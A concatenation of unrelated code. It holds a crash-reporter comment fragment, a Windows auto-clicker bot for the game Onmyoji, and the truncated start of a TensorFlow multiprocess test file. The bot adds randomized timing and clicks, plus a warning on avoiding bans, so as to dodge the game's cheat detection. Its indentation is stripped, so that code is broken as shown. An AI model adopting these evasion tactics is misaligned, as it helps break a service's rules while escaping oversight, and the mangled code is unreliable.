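#     try:
#         do_something_risky()                    # hypothetical call
#     except Exception as exc:
#         send_exception_to_crash_reporter(exc)   # routed to the hook (or queued if not ready)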
onmyoji_win.py
# -*-coding:utf-8-*-
import time
import datetime
import os
import sys  # used below for sys.argv and the PyInstaller _MEIPASS lookup
import random
import shelve
import threading
from queue import Queue
import win32api, win32gui, win32con, win32com.client
from ctypes import *
from PIL import ImageGrab, Image as PLI_Image, ImageTk
from tkinter import *
from tkinter import ttk
import tkinter.messagebox as messagebox
from tkinter.scrolledtext import ScrolledText
class GameController:
def __init__(self, hwnd, scaling):
        # Get the game window rectangle
self.hwnd = hwnd
self.left, self.top, self.right, self.bottom = win32gui.GetWindowRect(self.hwnd)
self.client_rect = win32gui.GetClientRect(self.hwnd)
self.width = self.client_rect[2]
self.height = self.client_rect[3]
        # Get the client-area (game view) screen coordinates
self.left, self.top = win32gui.ClientToScreen(self.hwnd, (0, 0))
self.right, self.bottom = win32gui.ClientToScreen(self.hwnd, (self.width, self.height))
        # Window coordinates after applying the display scaling factor
self.ltrb = list(map(lambda x: x * scaling, [self.left, self.top, self.right, self.bottom]))
self.scaling_width = self.width * scaling
self.scaling_height = self.height * scaling
        # 'Challenge' button coordinates
self.chllg_btn = (round(self.left + self.width * 0.695),
round(self.top + self.height * 0.67),
round(self.left + self.width * 0.785),
round(self.top + self.height * 0.73))
        # 'Start fight' button coordinates
self.fght_btn = (round(self.left + self.width * 0.75),
round(self.top + self.height * 0.82),
round(self.left + self.width * 0.87),
round(self.top + self.height * 0.88))
        # Sampling region of the 'exit fight' button
self.exit_btn = (round(self.ltrb[0] + self.scaling_width * 0.014),
round(self.ltrb[1] + self.scaling_height * 0.0245),
round(self.ltrb[0] + self.scaling_width * 0.0415),
round(self.ltrb[1] + self.scaling_height * 0.074))
        # Hash of the 'exit fight' button
self.exit_btn_hash = '1ff83ffc3ffe3ffe007e001f001f019f079e1ffe7fff7ffe1ff8078001800000'
        # Sampling region used to detect the settlement (reward) screen
self.settle_area = (round(self.ltrb[0] + self.scaling_width * 0.42),
round(self.ltrb[1] + self.scaling_height * 0.82),
round(self.ltrb[0] + self.scaling_width * 0.58),
round(self.ltrb[1] + self.scaling_height * 0.86))
        # Hash of the settlement detection region
self.settle_area_hash = '4f3f672f600fa01fb03ff03ff07df874f171d170c170c970c320c020c000c000'
        # Sampling region used to detect the solo-play screen
self.single_intf = (round(self.ltrb[0] + self.scaling_width * 0.45),
round(self.ltrb[1] + self.scaling_height * 0.1),
round(self.ltrb[0] + self.scaling_width * 0.58),
round(self.ltrb[1] + self.scaling_height * 0.18))
self.single_hash = '000000000000000000186e1836387ebc7ebc7eb86ed897fc0000ffffffffffff'
        # Sampling region used to detect the team-up screen
self.form_team_intf = (round(self.ltrb[0] + self.scaling_width * 0.12),
round(self.ltrb[1] + self.scaling_height * 0.8),
round(self.ltrb[0] + self.scaling_width * 0.24),
round(self.ltrb[1] + self.scaling_height * 0.88))
        # Hash of the team-up screen region
self.form_team_hash = '7ffeffffffffffffcd33cd33c823c923cd93c901e577ffffffff7ffe00000000'
        # Sampling region of team slot 1
self.form_team1 = (round(self.ltrb[0] + self.scaling_width * 0.2),
round(self.ltrb[1] + self.scaling_height * 0.4),
round(self.ltrb[0] + self.scaling_width * 0.28),
round(self.ltrb[1] + self.scaling_height * 0.53))
        # Sampling region of team slot 2
self.form_team2 = (round(self.ltrb[0] + self.scaling_width * 0.46),
round(self.ltrb[1] + self.scaling_height * 0.4),
round(self.ltrb[0] + self.scaling_width * 0.54),
round(self.ltrb[1] + self.scaling_height * 0.53))
        # Sampling region of team slot 3
self.form_team3 = (round(self.ltrb[0] + self.scaling_width * 0.76),
round(self.ltrb[1] + self.scaling_height * 0.4),
round(self.ltrb[0] + self.scaling_width * 0.84),
round(self.ltrb[1] + self.scaling_height * 0.53))
        # Sampling region of the 'tap screen to continue' text
self.notice_area = (round(self.ltrb[2] * 0.40),
round(self.ltrb[3] * 0.90),
round(self.ltrb[2] * 0.60),
round(self.ltrb[3] * 0.97))
        # Blank area clicked during settlement
self.blank_area = (round(self.left + self.width * 0.86),
round(self.top + self.height * 0.23),
round(self.left + self.width * 0.95),
round(self.top + self.height * 0.7))
        # Hash of an empty team slot
self.form_team_blank_hash = 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
        # Sampling region used to detect the bounty (wanted quest) dialog
self.offer_intf = (round(self.ltrb[0] + self.scaling_width * 0.4),
round(self.ltrb[1] + self.scaling_height * 0.2),
round(self.ltrb[0] + self.scaling_width * 0.6),
round(self.ltrb[1] + self.scaling_height * 0.28))
        # Hash of the bounty dialog region
self.offer_hash = 'ffffffffffff3fff35fde004200020000004040420100064247037f7ffffffff'
        # Coordinates of the bounty 'accept' button
self.accept = (round(self.left + self.width * 0.66),
round(self.top + self.height * 0.6))
        # Coordinates of the bounty 'decline' button
self.denied = (round(self.left + self.width * 0.66),
round(self.top + self.height * 0.74))
        # State initialization
self._running = 1
@staticmethod
def click_left_cur(counts=1):
for o in range(counts):
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP | win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
time.sleep(0.1)
time.sleep(0.1*random.random())
@staticmethod
def click_right_cur():
win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP | win32con.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
@staticmethod
def move_curpos(x, y):
time.sleep(0.5*random.random())
windll.user32.SetCursorPos(x, y)
time.sleep(0.5*random.random())
@staticmethod
def get_curpos():
return win32gui.GetCursorPos()
@staticmethod
def get_hash(img):
img = img.resize((16, 16), PLI_Image.ANTIALIAS).convert('L')
        avg = sum(list(img.getdata())) / 256  # average pixel value
        s = ''.join(map(lambda x: '0' if x < avg else '1', img.getdata()))  # '1' if the pixel is at least the average, else '0'
return ''.join(map(lambda j: '%x' % int(s[j:j + 4], 2), range(0, 256, 4)))
@staticmethod
def hamming(hash1, hash2, n=20):
result = False
assert len(hash1) == len(hash2)
# print(sum(ch1 != ch2 for ch1, ch2 in zip(hash1, hash2)))
if sum(ch1 != ch2 for ch1, ch2 in zip(hash1, hash2)) <= n:
result = True
return result
def form_team_phase(self, mode, fight_num, queue):
if mode == '单刷':
            # Move to the challenge button and click; add a random offset within the button area on every move
xrandom = int(random.uniform(0, self.chllg_btn[2] - self.chllg_btn[0]))
yrandom = int(random.uniform(0, self.chllg_btn[3] - self.chllg_btn[1]))
self.move_curpos(self.chllg_btn[0] + xrandom, self.chllg_btn[1] + yrandom)
time.sleep(0.5)
self.click_left_cur()
return
elif mode == '司机':
            # Wait until the team-up screen appears
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.form_team_intf)
if self.hamming(self.get_hash(catch_img), self.form_team_hash, 30):
break
time.sleep(0.5)
time.sleep(0.3*random.random())
elif self._running == 0:
return
            # Check the number of team members; start the fight only when it matches the expected count
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
num = 0
for i in [self.form_team1, self.form_team2, self.form_team3]:
catch_img = ImageGrab.grab(i)
# self.get_hash(catch_img)
if not self.hamming(self.get_hash(catch_img), self.form_team_blank_hash, 10):
num = num + 1
if num == fight_num:
break
time.sleep(0.5)
time.sleep(0.3*random.random())
elif self._running == 0:
return
            # Move to the 'start fight' button and click; add a random offset within the button area
xrandom = int(random.uniform(0, self.fght_btn[2] - self.fght_btn[0]))
yrandom = int(random.uniform(0, self.fght_btn[3] - self.fght_btn[1]))
self.move_curpos(self.fght_btn[0] + xrandom, self.fght_btn[1] + yrandom)
time.sleep(0.5)
time.sleep(0.3*random.random())
self.click_left_cur()
elif mode == '乘客':
return
def wait_fight_finish_phase(self, clear_time, queue):
t = 0
while t < clear_time:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
time.sleep(1)
t = t + 1
# print(t)
elif self._running == 0:
break
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.exit_btn)
# catch_img.save('fight.jpg', 'jpeg')
                # When the 'exit fight' button disappears, the fight is considered finished
if self.hamming(self.get_hash(catch_img), self.exit_btn_hash, 30):
pass
else:
break
elif self._running == 0:
return
time.sleep(0.5)
def settle_phase(self, queue):
for xx in range(0, 10):
if not queue.empty():
self._running = queue.get()
if self._running == 1:
                # When the camera pan ends and the settlement daruma appears, we are on the settlement screen
catch_img = ImageGrab.grab(self.settle_area)
# catch_img.save('%s.jpg' % xx, 'jpeg')
if self.hamming(self.get_hash(catch_img), self.settle_area_hash, 20):
break
else:
                    # Move the cursor to a random spot near the right edge and click 1-3 times
xrandom = int(random.uniform(0, self.blank_area[2] - self.blank_area[0]))
yrandom = int(random.uniform(0, self.blank_area[3] - self.blank_area[1]))
self.move_curpos(self.blank_area[0] + xrandom, self.blank_area[1] + yrandom)
self.click_left_cur(int(random.uniform(2, 4)))
elif self._running == 0:
break
time.sleep(0.5)
for xx in range(0, 10):
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.settle_area)
                # When the settlement daruma disappears, settlement is considered finished
if not self.hamming(self.get_hash(catch_img), self.settle_area_hash, 20):
break
else:
                    # Move the cursor to a random spot near the right edge and click 1-3 times until settlement ends
xrandom = int(random.uniform(0, self.blank_area[2] - self.blank_area[0]))
yrandom = int(random.uniform(0, self.blank_area[3] - self.blank_area[1]))
self.move_curpos(self.blank_area[0] + xrandom, self.blank_area[1] + yrandom)
time.sleep(random.random())
self.click_left_cur(int(random.uniform(2, 4)))
elif self._running == 0:
break
time.sleep(0.5)
time.sleep(0.3*random.random())
def check_offer(self, offer_mode, queue):
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.offer_intf)
if self.hamming(self.get_hash(catch_img), self.offer_hash, 30):
if offer_mode == "接受":
self.move_curpos(self.accept[0], self.accept[1])
elif offer_mode == "拒绝":
self.move_curpos(self.denied[0], self.denied[1])
self.click_left_cur()
time.sleep(1.3)
elif self._running == 0:
return
class Application(Frame):
def __init__(self, master=None):
self.warning = '【封号防止】\n' + \
'请尽量在自己的日常刷魂时间使用\n' + \
'请不要长时间连续使用,任何使你看起来明显违背人类正常作息规律的行为,很容易会被鬼使黑盯上\n' + \
'当你离开了常在城市,请不要使用,这会被认为是找了代练\n' + \
'点到为止,贪婪是万恶之源\n'
self.label = r'阴阳师-网易游戏'
self.hwnd = None
self.shell = None
if not self.info_get():
self.scaling = 1
self.clear_time = 35
self.fight = None
self.timing_value = None
        # Widget initialization
Frame.__init__(self, master)
self.pack()
self.frame1 = Frame(self)
self.frame1.pack()
self.frame2 = Frame(self)
self.frame2.pack()
self.label_scaling = Label(self.frame1)
self.var_scaling = StringVar(self.frame1)
self.entry_scaling = Entry(self.frame1)
self.button_scaling_explain = Button(self.frame1)
self.label_mode = Label(self.frame1)
self.var_mode = StringVar(self.frame1)
self.listbox_mode = ttk.Combobox(self.frame1)
self.button_mode_explain = Button(self.frame1)
self.label_member = Label(self.frame1)
self.var_member = IntVar()
self.radio1 = Radiobutton(self.frame1)
self.radio2 = Radiobutton(self.frame1)
self.label_clear_time = Label(self.frame1)
self.var_clear_time = StringVar(self.frame1)
self.entry_clear_time = Entry(self.frame1)
self.button_clear_time_explain = Button(self.frame1)
self.label_offer = Label(self.frame1)
self.var_offer_mode = StringVar(self.frame1)
self.listbox_offer_mode = ttk.Combobox(self.frame1)
self.label_timing_mode = Label(self.frame1)
self.var_timing_mode = StringVar(self.frame1)
self.listbox_timing_mode = ttk.Combobox(self.frame1)
self.var_timing_value = StringVar(self.frame1)
self.entry_timing_value = Entry(self.frame1)
self.entry_test = Entry(self.frame1)
self.test_btn = Button(self.frame1)
self.start_ctn = Button(self.frame2)
self.stop_ctn = Button(self.frame2)
self.info_box = ScrolledText(self.frame2)
self.queue = Queue(maxsize=1)
self._running = 1
self.create_main()
@staticmethod
def check_hwnd(label):
        # Get the game window handle
hwnd = win32gui.FindWindow(None, label)
if hwnd:
return hwnd
else:
print('游戏没有运行')
return False
@staticmethod
def init_window_place(root, x, y):
screenwidth = root.winfo_screenwidth()
screenheight = root.winfo_screenheight()
root.resizable(False, False)
root.update_idletasks()
root.deiconify()
width = root.winfo_width()
height = root.winfo_height()
size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / x, (screenheight - height) / y)
root.geometry(size)
def jump_window(self):
        # Bring the game window to the foreground
win32gui.SetForegroundWindow(self.hwnd)
win32gui.PostMessage(self.hwnd, win32con.WM_SYSCOMMAND, win32con.SC_RESTORE, 0)
def get_scaling(self):
var = self.entry_scaling.get()
try:
var = float(var)
except ValueError:
messagebox.showinfo(title='提示', message='缩放倍率只能为数字')
return False
if var > 2:
messagebox.showinfo(title='提示', message='缩放倍率过高')
return False
return var
def get_clear_time(self):
var = self.var_clear_time.get()
try:
var = float(var)
except ValueError:
messagebox.showinfo(title='提示', message='平均通关时间只能为数字')
return False
if var <= 5:
messagebox.showinfo(title='提示', message='平均通关时间不能小于5')
return False
return var
    def get_timing(self):
if self.listbox_timing_mode.get() == '无':
return True
var = self.var_timing_value.get()
try:
var = float(var)
except ValueError:
messagebox.showinfo(title='提示', message='预定结束只能填入数字')
return False
if var < 1:
messagebox.showinfo(title='提示', message='数字过小,无法执行')
return False
return var
@staticmethod
def time_format(second):
try:
second = int(second)
except ValueError:
return second
if second > 60:
m, s = divmod(second, 60)
h, m = divmod(m, 60)
return ':'.join((str(h).zfill(2), str(m).zfill(2), str(s).zfill(2)))
else:
return second
def info_get(self):
try:
with shelve.open('mysetting.db') as data:
setting_data = data['setting']
self.scaling = setting_data['scaling']
self.clear_time = setting_data['clear_time']
except KeyError:
return False
return True
def info_save(self):
with shelve.open('mysetting.db') as data:
setting_data = dict()
setting_data['scaling'] = self.var_scaling.get()
setting_data['clear_time'] = self.var_clear_time.get()
data['setting'] = setting_data
def turn_radio_on(self, *args):
type(args)
var = self.listbox_mode.get()
if var == '司机':
self.radio1.configure(state='active')
self.radio2.configure(state='active')
else:
self.radio1.configure(state='disabled')
self.radio2.configure(state='disabled')
def turn_entry_on(self, *args):
type(args)
var = self.listbox_timing_mode.get()
if var == '定时[分钟]' or var == '场数':
self.entry_timing_value.configure(state='normal')
else:
self.entry_timing_value.configure(state='disabled')
def fight_start(self):
self.scaling = self.get_scaling()
if not self.scaling:
return False
self.clear_time = self.get_clear_time()
if not self.clear_time:
return False
        self.timing_value = self.get_timing()
if not self.timing_value:
return False
self.info_save()
        # Get the game window handle
self.hwnd = self.check_hwnd(self.label)
if not self.hwnd:
messagebox.showinfo(title='提示', message='游戏没有运行')
return False
self.shell = win32com.client.Dispatch("WScript.Shell")
# self.shell.SendKeys('%')
self.jump_window()
time.sleep(0.5)
self.fight = GameController(self.hwnd, self.scaling)
thread1 = threading.Thread(target=self.fight_thread, name='fight_thread')
thread2 = threading.Thread(target=self.offer_thread, name='offer_thread')
        # Set the thread state and the queue content to 1 (running)
self._running = 1
if self.queue.empty():
self.queue.put(1)
else:
self.queue.get()
self.queue.put(1)
self.start_ctn.configure(state='disabled')
self.stop_ctn.configure(state='active')
thread1.start()
thread2.start()
def fight_thread(self):
self.jump_window()
if not self.queue.empty():
self.queue.get()
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(self.warning) + '\n', 'RED')
self.info_box.tag_config('RED', foreground='red')
var = '[%s]挂机开始' % datetime.datetime.now().strftime("%H:%M:%S")
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
rounds = 0
total_time = 0
        beginning_time = time.clock()
while True:
if self._running == 1:
fight_start_time = time.clock()
self.fight.form_team_phase(self.listbox_mode.get(), self.var_member.get(), self.queue)
self.fight.wait_fight_finish_phase(self.clear_time, self.queue)
self.jump_window()
self.fight.settle_phase(self.queue)
if self._running == 1:
fight_end_time = time.clock()
fight_time = fight_end_time - fight_start_time
# time.sleep(0.5)
rounds = rounds + 1
total_time = total_time + fight_time
                    elapsed_time = fight_end_time - beginning_time
var = '第 %s 场 耗时:%s 共计:%s' % \
(rounds, self.time_format(fight_time), self.time_format(elapsed_time))
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
                    # Check whether the scheduled number of rounds or the time limit has been reached
if (self.listbox_timing_mode.get() == '场数' and rounds >= self.timing_value) or \
(self.listbox_timing_mode.get() == '定时[分钟]' and elapsed_time / 60 >= self.timing_value):
win32gui.PostMessage(self.hwnd, win32con.WM_CLOSE, 0, 0)
self.fight_stop()
var = '已到达预定目标,游戏窗口已关闭。下线15分钟后buff自动关闭'
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
time.sleep(random.uniform(1, 2))
elif self._running == 0:
return
def fight_stop(self):
        # Set the thread state and the queue content to 0 (stopped)
self._running = 0
self.queue.put(0)
self.start_ctn.configure(state='active')
self.stop_ctn.configure(state='disabled')
var = '[%s]挂机结束。记得关御魂buff' % datetime.datetime.now().strftime("%H:%M:%S")
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
def offer_thread(self):
while True:
if self._running == 1:
self.fight.check_offer(self.listbox_offer_mode.get(), self.queue)
elif self._running == 0:
return
@staticmethod
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(base_path, relative_path)
def what_is_scaling_window(self):
what_is_scaling = Toplevel(self)
what_is_scaling.title('缩放倍率 - 不能自动获取,技术就是这么菜,不服憋着_(:3」∠)_')
frame1 = Frame(what_is_scaling)
frame1.pack()
frame2 = Frame(what_is_scaling)
frame2.pack()
title = Label(frame1)
title['text'] = '\n【 缩放倍率 】'
title.pack()
desc1 = Message(frame1)
desc1['width'] = 600
desc1['text'] = '\n缩放倍率是指Windows系统在不改变分辨率的情况下,将窗口和图标放大以达到更加舒适的显示效果的功能\n' + \
'\n在某些分辨率下,Windows会自动设置一个超过100%的倍率。请确定自己系统当前的缩放倍率设置,并填入缩放倍率一栏中\n' + \
'\n不正确的缩放倍率设置,会导致坐标计算不准\n' + \
'\n若设置的缩放倍率是100%,则填入1,若是125%,则填1.25,依次类推\n'
desc1.pack()
label_win10 = Label(frame2)
label_win10['text'] = 'Windows 10'
label_win10.grid(row=0, column=0)
label_win7 = Label(frame2)
label_win7['text'] = 'Windows 7'
label_win7.grid(row=0, column=1)
ipath = self.resource_path('image/win10.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img_win10 = Label(frame2, image=render)
img_win10.image = render
img_win10.grid(row=1, column=0)
ipath = self.resource_path('image/win7.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img_win7 = Label(frame2, image=render)
img_win7.image = render
img_win7.grid(row=1, column=1)
self.init_window_place(what_is_scaling, 1.3, 3)
def when_click_start_window(self):
when_click_start = Toplevel(self)
when_click_start.title('模式说明')
var = self.listbox_mode.get()
if var == '单刷':
title = Label(when_click_start)
title['text'] = '\n【 单刷模式 】'
title.pack()
desc = Message(when_click_start)
desc['text'] = '\n请把游戏调整至如图所示界面,再点START\n'
desc['width'] = 300
desc.pack()
ipath = self.resource_path('image/single.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.7), load.size)))
render = ImageTk.PhotoImage(load)
img = Label(when_click_start, image=render)
img.image = render
img.pack()
elif var == '乘客':
title = Label(when_click_start)
title['text'] = '\n【 乘客模式 】'
title.pack()
desc = Message(when_click_start)
desc['text'] = '\n建议接受了司机的默认邀请,再点START\n' + \
'因为我不会在战斗里帮你点开始...不服憋着\n_(:3」∠)_\n'
desc['width'] = 300
desc.pack()
ipath = self.resource_path('image/passenger_accept.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.7), load.size)))
render = ImageTk.PhotoImage(load)
img = Label(when_click_start, image=render)
img.image = render
img.pack()
elif var == '司机':
title = Label(when_click_start)
title['text'] = '\n【 司机模式 】'
title.pack()
desc = Message(when_click_start)
desc['text'] = '\n建议对乘客发出默认邀请,回到组队界面再点START\n' + \
'因为自动发出邀请这个功能没写...不服憋着\n_(:3」∠)_\n'
desc['width'] = 300
desc.pack()
ipath = self.resource_path('image/driver_invite.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img1 = Label(when_click_start, image=render)
img1.image = render
img1.pack()
ipath = self.resource_path('image/driver_form.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img2 = Label(when_click_start, image=render)
img2.image = render
img2.pack()
self.init_window_place(when_click_start, 1.3, 3)
def what_is_clear_time(self):
what_is_clear = Toplevel(self)
what_is_clear.title('平均通关时间说明')
title = Label(what_is_clear)
title['text'] = '\n【 平均通关时间 】'
title.pack()
desc = Message(what_is_clear)
desc['text'] = '\n平均通关时间是指在游戏中,从按下开始战斗到进入结算奖励界面所经过的时间(秒)\n' + \
'\n程序会在经过指定的时间后,再开始检测游戏画面是否进入了结算界面\n' + \
'\n如果设置一个较短的时间也可以,不过设置一个合理的时间,能节省你CPU资源\n(其实也没占多少_(:3」∠)_\n'
desc['width'] = 300
desc.pack()
self.init_window_place(what_is_clear, 1.3, 3)
def create_main(self):
self.label_scaling['text'] = '缩放倍率'
self.var_scaling.set(self.scaling)
self.entry_scaling['textvariable'] = self.var_scaling
self.label_scaling.grid(row=0, column=0, sticky='E')
self.entry_scaling.grid(row=0, column=1, sticky='W', columnspan=2)
self.button_scaling_explain['text'] = '?'
self.button_scaling_explain['command'] = self.what_is_scaling_window
self.button_scaling_explain['relief'] = 'flat'
self.button_scaling_explain.grid(row=0, column=2, sticky='E')
self.label_mode['text'] = '模式'
self.var_mode.set('单刷')
self.listbox_mode['textvariable'] = self.var_mode
self.listbox_mode['width'] = 10
self.listbox_mode['values'] = ["单刷", "乘客", "司机"]
self.listbox_mode.bind("<<ComboboxSelected>>", self.turn_radio_on)
self.label_mode.grid(row=1, column=0, sticky='E')
self.listbox_mode.grid(row=1, column=1, sticky='W')
self.button_mode_explain['text'] = '?'
self.button_mode_explain['command'] = self.when_click_start_window
self.button_mode_explain['relief'] = 'flat'
self.button_mode_explain.grid(row=1, column=2, sticky='W')
self.var_member.set(2)
self.label_member['text'] = '车队人数'
self.label_member.grid(row=2, column=0, sticky='E')
self.radio1['text'] = '2人'
self.radio1['variable'] = self.var_member
self.radio1['value'] = 2
# self.radio1['command'] = self.test_val3
self.radio1.grid(row=2, column=1, sticky='W')
self.radio1.configure(state='disabled')
self.radio2['text'] = '3人'
self.radio2['variable'] = self.var_member
self.radio2['value'] = 3
# self.radio2['command'] = self.test_val3
self.radio2.grid(row=2, column=2, sticky='W')
self.radio2.configure(state='disabled')
self.label_clear_time['text'] = '平均通关时间'
self.var_clear_time.set(self.clear_time)
self.entry_clear_time['textvariable'] = self.var_clear_time
self.label_clear_time.grid(row=3, column=0, sticky='E')
self.entry_clear_time.grid(row=3, column=1, sticky='W', columnspan=2)
self.button_clear_time_explain['text'] = '?'
self.button_clear_time_explain['command'] = self.what_is_clear_time
self.button_clear_time_explain['relief'] = 'flat'
self.button_clear_time_explain.grid(row=3, column=2, sticky='E')
self.label_offer['text'] = '好友发来悬赏'
self.var_offer_mode.set('接受')
self.listbox_offer_mode['textvariable'] = self.var_offer_mode
self.listbox_offer_mode['width'] = 10
self.listbox_offer_mode['values'] = ["接受", "拒绝"]
self.listbox_offer_mode.bind("<<ComboboxSelected>>", self.turn_radio_on)
self.label_offer.grid(row=4, column=0, sticky='E')
self.listbox_offer_mode.grid(row=4, column=1, sticky='W')
self.label_timing_mode['text'] = '预定结束'
self.var_timing_mode.set('无')
self.listbox_timing_mode['textvariable'] = self.var_timing_mode
self.listbox_timing_mode['width'] = 10
self.listbox_timing_mode['values'] = ["无", "定时[分钟]", "场数"]
self.listbox_timing_mode.bind("<<ComboboxSelected>>", self.turn_entry_on)
self.label_timing_mode.grid(row=5, column=0, sticky='E')
self.listbox_timing_mode.grid(row=5, column=1, sticky='W')
self.var_timing_value.set('')
self.entry_timing_value['textvariable'] = self.var_timing_value
self.entry_timing_value['width'] = 5
self.entry_timing_value.configure(state='disabled')
self.entry_timing_value.grid(row=5, column=2, sticky='W')
self.start_ctn['text'] = 'START'
self.start_ctn['width'] = 10
self.start_ctn['height'] = 2
self.start_ctn['command'] = self.fight_start
self.start_ctn['relief'] = 'groove'
self.start_ctn.grid(row=0, column=0, sticky='E')
self.stop_ctn['text'] = 'STOP'
self.stop_ctn['width'] = 10
self.stop_ctn['height'] = 2
self.stop_ctn['command'] = self.fight_stop
self.stop_ctn['relief'] = 'groove'
self.stop_ctn.grid(row=0, column=1, sticky='W')
self.stop_ctn.configure(state='disabled')
self.info_box['width'] = 40
self.info_box['height'] = 20
self.info_box.grid(row=1, column=0, columnspan=2)
self.info_box.see(END)
var = '请授予此程序管理员权限运行,否则在游戏窗口内鼠标无法被控制'
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
app = Application()
# Hide the console window
try:
test = sys.argv[1]
except IndexError:
test = False
if test == 'test':
pass
else:
whnd = windll.kernel32.GetConsoleWindow()
if whnd:
windll.user32.ShowWindow(whnd, 0)
windll.kernel32.CloseHandle(whnd)
app.master.title('就你破势多')
app.init_window_place(app.master, 1.1, 4)
app.mainloop()
|
multi_process_runner_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `multi_process_runner`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import json
import os
import sys
import threading
import time
import unittest
from absl import logging
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.eager import context
from tensorflow.python.eager import test
def fn_that_adds_task_type_in_return_data():
return multi_worker_test_base.get_task_type()
def fn_that_errors():
raise ValueError('This is an error.')
def fn_that_does_nothing():
pass
def fn_that_adds_simple_return_data():
return 'dummy_data'
def fn_that_returns_args_and_kwargs(*args, **kwargs):
return list(args) + list(kwargs.items())
def fn_with_barrier():
return multi_process_runner.get_barrier()
def fn_that_returns_pid():
return os.getpid()
V = None
def fn_that_sets_global(val):
global V
old_val = V
V = val
return old_val
@combinations.generate(combinations.combine(required_gpus=0))
class MultiProcessRunnerTest(test.TestCase, parameterized.TestCase):
def _worker_idx(self):
config_task = json.loads(os.environ['TF_CONFIG'])['task']
return config_task['index']
def test_multi_process_runner(self):
mpr_result = multi_process_runner.run(
fn_that_adds_task_type_in_return_data,
multi_worker_test_base.create_cluster_spec(
num_workers=2, num_ps=3, has_chief=True))
job_count_dict = {'worker': 2, 'ps': 3, 'chief': 1}
for data in mpr_result.return_value:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['ps'], 0)
self.assertEqual(job_count_dict['chief'], 0)
def test_multi_process_runner_error_propagates_from_subprocesses(self):
runner = multi_process_runner.MultiProcessRunner(
fn_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=1, num_ps=1),
max_run_time=20)
runner.start()
with self.assertRaisesRegex(ValueError, 'This is an error.'):
runner.join()
def test_multi_process_runner_queue_emptied_between_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
return_value = multi_process_runner.run(fn_that_adds_simple_return_data,
cluster_spec).return_value
self.assertTrue(return_value)
self.assertEqual(return_value[0], 'dummy_data')
self.assertEqual(return_value[1], 'dummy_data')
return_value = multi_process_runner.run(fn_that_does_nothing,
cluster_spec).return_value
self.assertFalse(return_value)
def test_multi_process_runner_args_passed_correctly(self):
return_value = multi_process_runner.run(
fn_that_returns_args_and_kwargs,
multi_worker_test_base.create_cluster_spec(num_workers=1),
args=('a', 'b'),
kwargs={
'c_k': 'c_v'
}).return_value
self.assertEqual(return_value[0][0], 'a')
self.assertEqual(return_value[0][1], 'b')
self.assertEqual(return_value[0][2], ('c_k', 'c_v'))
def test_stdout_captured(self):
def simple_print_func():
print('This is something printed.', flush=True)
return 'This is returned data.'
mpr_result = multi_process_runner.run(
simple_print_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
std_stream_results = mpr_result.stdout
return_value = mpr_result.return_value
self.assertIn('[worker-0]: This is something printed.\n',
std_stream_results)
self.assertIn('[worker-1]: This is something printed.\n',
std_stream_results)
self.assertIn('This is returned data.', return_value)
def test_termination(self):
def fn():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(5)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
mpr.start()
time.sleep(5)
mpr.terminate('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, so it should not have iteration 9
# printed.
self.assertIn('[worker-0]: index 0, iteration 0\n', std_stream_results)
self.assertNotIn('[worker-0]: index 0, iteration 9\n',
